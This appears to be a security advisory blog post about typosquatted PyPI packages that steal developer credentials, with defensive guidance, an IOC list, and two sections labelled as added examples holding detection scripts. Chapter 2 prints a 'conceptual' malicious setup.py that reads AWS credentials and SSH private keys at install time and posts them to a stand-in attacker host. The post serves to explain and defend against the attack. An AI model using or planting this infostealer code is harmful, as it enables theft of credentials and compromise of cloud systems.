
URGENT: New Malicious PyPI Packages are Stealing Your Credentials!
By CyberDudeBivash • October 02, 2025, 07:30 AM IST • Software Supply Chain Alert
This is an urgent security alert for the entire Python development community. A new wave of malicious packages has been discovered on the official Python Package Index (PyPI) that are designed to steal developer credentials, including AWS keys, SSH keys, and other sensitive environment variables. The primary attack vector is **typosquatting**, where attackers prey on simple human error to trick developers into installing their malware. The malicious code executes immediately upon installation, exfiltrating your most sensitive secrets before you even realize a mistake has been made. This is a direct assault on the trust of the open-source ecosystem and a critical software supply chain threat. All developers and DevSecOps teams must take immediate action to audit their environments.
Threat Report: Table of Contents
- Chapter 1: The Weaponized Typo — How Typosquatting Works
- Chapter 2: Threat Analysis — The Malicious `setup.py` Script
- Chapter 3: The Kill Chain — From `pip install` to Full Cloud Compromise
- Chapter 4: The Defender’s Playbook — A Guide for Developers and DevSecOps Teams
- Chapter 5: Strategic Summary & List of Malicious Packages (IOCs)
Chapter 1: The Weaponized Typo — How Typosquatting Works
Typosquatting is a simple but brutally effective social engineering attack that targets developers. Attackers identify popular, commonly used libraries and upload their own malicious packages to PyPI with names that are common misspellings.
For example:
- Legitimate Package: `requests` -> Malicious Package: `reqeusts`
- Legitimate Package: `python-dateutil` -> Malicious Package: `python-datetutil`
- Legitimate Package: `beautifulsoup4` -> Malicious Package: `beautifullsoup4`
A busy developer, typing quickly on the command line, can easily make one of these typos. When they run `pip install reqeusts`, they are not downloading the legitimate library; they are downloading and executing the attacker’s code. This is a form of software supply chain attack similar to, but more direct than, the **‘SoopSocks’ backdoor** we recently analyzed.
Chapter 2: Threat Analysis — The Malicious `setup.py` Script
The malicious code is hidden in plain sight within the package’s `setup.py` file. This script is designed to run automatically during the `pip install` process.
The attacker’s script is a simple but potent infostealer. Here is a conceptual example of its logic:
```python
# --- CONCEPTUAL MALICIOUS setup.py ---
import os
import requests
from setuptools import setup

# Malicious function to steal credentials
def exfiltrate_secrets():
    secrets = {}
    # Steal AWS credentials
    aws_path = os.path.expanduser('~/.aws/credentials')
    if os.path.exists(aws_path):
        with open(aws_path, 'r') as f:
            secrets['aws_creds'] = f.read()
    # Steal SSH keys
    ssh_path = os.path.expanduser('~/.ssh/id_rsa')
    if os.path.exists(ssh_path):
        with open(ssh_path, 'r') as f:
            secrets['ssh_key'] = f.read()
    # Send stolen data to attacker's server
    if secrets:
        requests.post("http://attacker-c2.com/collect", json=secrets)

# --- Main execution ---
# Run the malicious function immediately
exfiltrate_secrets()

# Proceed with a fake or real installation to avoid suspicion
setup(
    name='reqeusts',
    version='2.25.1',
    description='A fake package to hide malware.',
    # ... etc
)
```
By the time `pip` reports a successful installation, the developer’s most valuable credentials have already been stolen.
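Because the theft happens when `setup.py` runs, a suspect source distribution should be inspected without executing it. The following is an added example, not code from the original advisory: a static triage that parses a `setup.py` with Python's `ast` module and flags the three traits of the conceptual script above. The indicator lists, the function name `triage_setup_py`, and the sample input are assumptions constructed for illustration.

```python
import ast

# Assumed indicator lists for this example; extend them for your own environment.
NETWORK_MODULES = {"requests", "urllib", "http", "socket", "httpx"}
SECRET_PATHS = ("~/.aws", "~/.ssh", ".aws/credentials", "id_rsa")

def triage_setup_py(source):
    """Statically inspect setup.py source (never executing it) and return findings."""
    tree = ast.parse(source)
    defined = {n.name for n in tree.body if isinstance(n, ast.FunctionDef)}
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            mods = [alias.name.split(".")[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [(node.module or "").split(".")[0]]
        else:
            mods = []
        for mod in mods:
            if mod in NETWORK_MODULES:
                findings.append(f"line {node.lineno}: imports network module '{mod}'")
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(p in node.value for p in SECRET_PATHS):
                findings.append(f"line {node.lineno}: references credential path {node.value!r}")
    # Calls made at module level run the moment pip executes setup.py.
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            func = stmt.value.func
            if isinstance(func, ast.Name) and func.id in defined:
                findings.append(f"line {stmt.lineno}: install-time call to local function '{func.id}()'")
    return findings

# Constructed sample modelled on the conceptual script above (inert: only parsed, never run).
SAMPLE = '''\
import os
import requests
from setuptools import setup

def collect():
    path = os.path.expanduser('~/.aws/credentials')
    requests.post("http://collector.example.invalid/c", data=open(path).read())

collect()
setup(name='reqeusts', version='2.25.1')
'''

if __name__ == "__main__":
    for finding in triage_setup_py(SAMPLE):
        print(finding)
```

These are heuristics for a first pass: obfuscated or dynamically built strings will not match, so a clean result does not clear a package.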
Chapter 3: The Kill Chain — From `pip install` to Full Cloud Compromise
The impact of this seemingly small mistake is catastrophic.
- **Publication & Infection:** The attacker uploads the typosquatted package. A developer at a target company makes a typo and runs `pip install python-datetutil`.
- **Instant Credential Theft:** The `setup.py` script executes immediately, stealing the developer’s AWS keys from their local machine and sending them to the attacker.
- **Cloud Infrastructure Takeover:** The attacker uses the stolen AWS keys. If the developer had high privileges (a common mistake), the attacker now has administrative access to the company’s AWS environment.
- **Impact:** The attacker can now perform any number of malicious actions:
  - Spin up hundreds of expensive GPUs for cryptocurrency mining, leaving the company with a massive bill.
  - Steal or delete sensitive company data stored in S3 buckets.
  - Deploy ransomware across the entire fleet of cloud servers.
Chapter 4: The Defender’s Playbook — A Guide for Developers and DevSecOps Teams
Defending against typosquatting requires discipline and automation.
For Individual Developers
- **Audit Your Dependencies:** Use `pip freeze` in your virtual environment and carefully read every single package name. Do they look correct? Google any you don’t recognize.
- **Use `--require-hashes`:** When using a `requirements.txt` file, you can use hash-checking mode (`pip install -r requirements.txt --require-hashes`). This forces pip to verify the hash of the package it’s downloading, preventing a compromised or typosquatted package from being installed.
- **Protect Your Endpoints:** Your last line of defense is an EDR that can spot the anomalous behavior of a Python script suddenly reading files in `~/.aws` or `~/.ssh` and making a network connection.
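Reading `pip freeze` output by eye misses exactly the typos this attack relies on, so the audit step can be automated. The following is an added example, not part of the original advisory: it compares installed distribution names against an allow-list using an edit distance that counts adjacent transpositions, after PEP 503 name normalization. The `KNOWN_GOOD` allow-list and all function names are assumptions for illustration; substitute the packages you actually intend to depend on.

```python
import re
from importlib import metadata

# Assumed allow-list of names you intend to depend on (hypothetical; use your own).
KNOWN_GOOD = {"requests", "python-dateutil", "beautifulsoup4", "django", "pyopenssl"}

def normalize(name):
    """PEP 503 normalization: lowercase, runs of -, _ and . collapse to one hyphen."""
    return re.sub(r"[-_.]+", "-", name).lower()

def osa_distance(a, b):
    """Edit distance counting insert, delete, substitute and adjacent transposition."""
    rows = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        rows[i][0] = i
    for j in range(len(b) + 1):
        rows[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = a[i - 1] != b[j - 1]
            rows[i][j] = min(rows[i - 1][j] + 1, rows[i][j - 1] + 1, rows[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                rows[i][j] = min(rows[i][j], rows[i - 2][j - 2] + 1)
    return rows[len(a)][len(b)]

def find_lookalikes(installed, known_good=KNOWN_GOOD, max_distance=2):
    """Return {installed_name: intended_name} for names close to, but not in, the allow-list."""
    good = {normalize(n) for n in known_good}
    hits = {}
    for raw in installed:
        name = normalize(raw)
        if name in good:
            continue
        for target in sorted(good):
            # Compare with and without separators so 'py-openssl' matches 'pyopenssl'.
            d = min(osa_distance(name, target),
                    osa_distance(name.replace("-", ""), target.replace("-", "")))
            if d <= max_distance:
                hits[raw] = target
                break
    return hits

def installed_names():
    """Names of every distribution visible to this interpreter."""
    return [d.metadata["Name"] for d in metadata.distributions() if d.metadata["Name"]]

if __name__ == "__main__":
    for bad, good in find_lookalikes(installed_names()).items():
        print(f"SUSPICIOUS: {bad!r} looks like {good!r}")
```

Run it inside each virtual environment you want to audit. A match is a prompt for manual review, since a legitimate package can sit within two edits of another.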
For DevSecOps Teams
- **Automate Dependency Scanning:** Integrate automated security tools into your CI/CD pipeline. Tools like `pip-audit` or commercial Software Composition Analysis (SCA) solutions can automatically check your dependencies against a database of known malicious packages.
- **Use a Private Repository:** Consider hosting a vetted, internal mirror of PyPI. This allows you to control exactly which packages your developers can install, preventing them from accidentally pulling a typosquatted package from the public internet.
👉 Building a secure CI/CD pipeline is the core of modern **DevSecOps**. It is a non-negotiable part of any mature software development organization.
Chapter 5: Strategic Summary & List of Malicious Packages (IOCs)
The trust-based model of open-source repositories is both a strength and a weakness. Typosquatting attacks prove that this trust can be easily abused. A multi-layered defense, combining developer vigilance, automated pipeline security, and robust endpoint protection, is the only effective strategy to mitigate this persistent software supply chain risk.
Indicators of Compromise (Known Malicious Packages)
Immediately audit all systems for the presence of the following (and similar) typosquatted packages. This is not an exhaustive list.
- `python-datetutil` (instead of `python-dateutil`)
- `reqeusts` (instead of `requests`)
- `djanga` (instead of `django`)
- `beautifullsoup4` (instead of `beautifulsoup4`)
- `py-openssl` (instead of `pyopenssl`)
If you find any of these packages installed, assume the host machine and all credentials on it have been compromised. Trigger your incident response plan immediately.
About the Author
CyberDudeBivash is a cybersecurity strategist and researcher with over 15 years of experience in application security, DevSecOps, and software supply chain security. He provides strategic advisory services to CISOs and boards across the APAC region. [Last Updated: October 02, 2025]